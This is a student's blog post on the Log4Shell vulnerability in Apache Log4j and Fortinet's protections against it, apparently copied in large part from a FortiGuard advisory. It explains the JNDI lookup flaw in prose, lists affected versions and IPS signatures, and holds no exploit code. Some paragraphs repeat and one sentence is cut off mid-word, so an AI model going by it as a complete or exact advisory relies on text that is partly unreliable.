LOG4SHELL: CRITICAL LOG4J VULNERABILITY CVE-2021–44228 (Effects ON Fortigate Firewalls)

FortiGuard Labs is aware of a remote code execution vulnerability in Apache Log4j. Log4j is a Java based logging audit framework within Apache. Apache Log4j2 2.14.1 and below are susceptible to a remote code execution vulnerability where a remote attacker can leverage this vulnerability to take full control of a vulnerable machine. This vulnerability is also known as Log4shell and has the CVE assignment (CVE-2021–44228). FortiGuard Labs will be monitoring this issue for any further developments.

The flaw is caused by a feature called message lookup substitution. When enabled (which it was, by default, before the bug fix), Log4j would detect strings referencing JNDI resources in configuration sources, log messages, and parameters passed by applications. Because Log4J doesn’t sanitize URLs passed in these strings, an attacker can craft malicious requests to applications that use Log4J containing message substitution strings in fields containing a URL for a malicious server.

Apache Log4j2 versions 2.14.1 and below Java Naming and Directory Interface (JNDI) features do not protect against attacker controlled LDAP and other JNDI related endpoints. A remote code execution vulnerability exists where attacker controlled log messages or log message parameters are able to execute arbitrary code loaded from LDAP servers when message lookup substitution is enab

Apache Log4J versions 2.0-beta9 to 2.14.1 are affected.

Yes, moving to version 2.15.0 mitigates this issue. Further mitigation steps are available from Apache as well. Please refer to the “Apache Log4j Security Vulnerabilities” in the APPENDIX for details.

10 (CRITICAL)

According to Apache: Log4j is a tool to help the programmer output log statements to a variety of output targets. In case of problems with an application, it is helpful to enable logging so that the problem can be located. With log4j it is possible to enable logging at runtime without modifying the application binary. The log4j package is designed so that log statements can remain in shipped code without incurring a high performance cost. It follows that the speed of logging (or rather not logging) is capital. At the same time, log output can be so voluminous that it quickly becomes overwhelming. One of the distinctive features of log4j is the notion of hierarchical loggers. Using loggers it is possible to selectively control which log statements are output at arbitrary granularity.

note: According to ‘fortiguard.com’, fortiguard firewalls are not affected by the log4shell

Detection of exploitable systems is possible via FortiEDR threat hunting by searching for loading of vulnerable log4j versions. This is an example of loading a vulnerable log4j library by a Apache Tomcat Server: FortiGuard Labs has IPS coverage in place for this issue as (version 19.215):

Apache.Log4j.Error.Log.Remote.Code.Execution

While we urge customers to patch vulnerable systems as soon as possible, FortiEDR monitors and protects against payloads delivered by exploitation of the vulnerability. The picture below demonstrates blocking of a PowerShell payload used as part of CVE-2021- 44228 exploitation

Detection of exploitable systems is possible via FortiEDR threat hunting by searching for loading of vulnerable log4j versions. This is an example of loading a vulnerable log4j library by a Apache Tomcat Server:

For full details of protections and detections for the IoCs related to this vulnerability, please see the Log4j2 Vulnerability Outbreak Alert (https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability)

Fortinet have released& IPS signature Apache.Log4j.Error.Log.Remote.Code.Execution, with VID 51006 to address this threat. This signature was initially released in IPS package (version 19.215),. Please note that, since this is an emergency release, the default action for this signature is set to pass. Please modify the action according to your need. As of IPS DB version 19.217 this signature was set to drop by default.

FortiADC supports IPS signature to mitigate log4j (version 19.215). FortiProxy supports IPS signature to mitigate log4j (version 19.215).

Web Application signatures to prevent this vulnerability were first added in database 0.00305 and have been updated in recent releases to add additional coverage Using FortiAnalyzer to detect activities related to exploits of Apache Log4j2 vulnerability

Using FortiAnalyzer to detect activities related to exploits of Apache Log4j2 vulnerability

Hope you got an understanding about the Effects ON Fortigate Firewalls

thank you for reading

Written by Kavindu Viraj— 3rd Year 1st Semester -Cyber Security Student-SLIIT

--

--

--

First they begin with Us..

Love podcasts or audiobooks? Learn on the go with our new app.

Cyber Security News of the week — 21.03.2022|25.03.2022

Azure Private Link Service explanation and demos from provider (SaaS ISV) and consumer perspectives

ExploitedToadz, A Technical Deepdive

{UPDATE} 클럽포커 온라인 -바둑이 Hack Free Resources Generator

The Mask Network Multi-Chain Ecosystem Officially Starts, with $MASK Now Live on BSC

Introducing the $MASK Token

Tackling P2P payment fraud

Should I Have a Designated Home Office Phone Number?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
SLIIT CS2

SLIIT CS2

First they begin with Us..

More from Medium

Blog On Cloud Endpoint

Behind the Scenes: Becoming Beauty For All Industries (BFA)

Clutter Overflow PicoCTF Writeup

6 Simple Steps Pave the Way to the Cloud — SyncCore Cloud Blog